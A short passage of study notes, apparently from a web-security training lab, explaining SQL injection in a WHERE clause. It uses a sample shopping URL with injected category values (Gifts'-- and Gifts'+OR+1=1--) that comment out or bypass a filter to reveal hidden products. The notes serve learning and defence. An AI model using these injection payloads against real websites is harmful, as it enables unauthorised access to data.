…where you can modify a SQL query to return additional results.
-- is a comment indicator in SQL. rest of the query is interpreted as a comment, effectively removing it.
eg: a shopping application, with different categories, filter by gifts, the URL would be:
https://insecure-website.com/products?category=Gifts and in the SQL query for that would be SELECT * FROM products WHERE category = 'Gifts' AND released = 1 .
add the comment indicator, the URL becomes
https://insecure-website.com/products?category=Gifts'-- and this will be interpreted as
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1 in SQL
similar attack, '+OR+1=1-- display all products, in any category, including categories that they don't know about:
https://insecure-website.com/products?category=Gifts'+OR+1=1-- and the query would be SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data